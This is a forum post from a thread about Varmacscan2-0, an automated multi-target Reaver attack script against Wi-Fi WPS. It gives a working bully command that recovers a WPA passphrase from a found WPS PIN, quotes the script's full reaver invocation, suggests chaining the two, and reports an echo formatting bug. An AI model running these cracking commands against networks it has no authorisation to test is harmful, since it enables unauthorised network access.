Results 1 to 50 of 65

Thread: Varmacscan2-0 an automatic multi-target reaver attack tool released

Threaded View

Previous Post Previous Post   Next Post Next Post
  1. #11
    Ok mmusket33, it seems to happen more often here, i've got 6 pins and no WPA.

    I though the problem would be the same related in this link: https://code.google.com/p/reaver-wps/issues/detail?id=203 (Issue 203: Reaver finds PIN but not passphrase)

    So i tried to use "bully" to crack the WPA and it worked !

    "bully -b XX:XX:XX:XX:XX:XX -c 3 -B -v 2 -p 20863463"

    Maybe another solution, would be to auto run bully instead of reaver at line 695, after wps pin is found...

    Code:
    xterm -g 80x15-1+100 -T "reaver pin= $WPSPIN" -e "reaver -i $monitor -a -f -c $channel -b $bssid -r 2:15 -L -E -vvv -N -T 1 -t 20 -d 0 -x 30 --pin=$WPSPIN --mac=$VARMAC --session tmp/$bssid  2>&1 | tee VARMAC_LOGS/$bssid-$ssid-$DATEFILE-$PAD" &
    BTW: There's a small bug at line 708 of "varmacscan2-0.sh"

    Code:
    [+] echo -e " Standby while all ESSID Probe Data from airodump-ng is processed...."
    should be

    Code:
    echo -e "[+] Standby while all ESSID Probe Data from airodump-ng is processed...."
    Last edited by brunoaduarte; 2015-11-30 at 17:24.

Similar Threads

  1. Replies: 18
    Last Post: 2017-01-12, 01:14
  2. A Reaver Based Multi-Target Pin Harvesting Program
    By mmusket33 in forum How-To Archive
    Replies: 10
    Last Post: 2014-10-29, 02:15

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •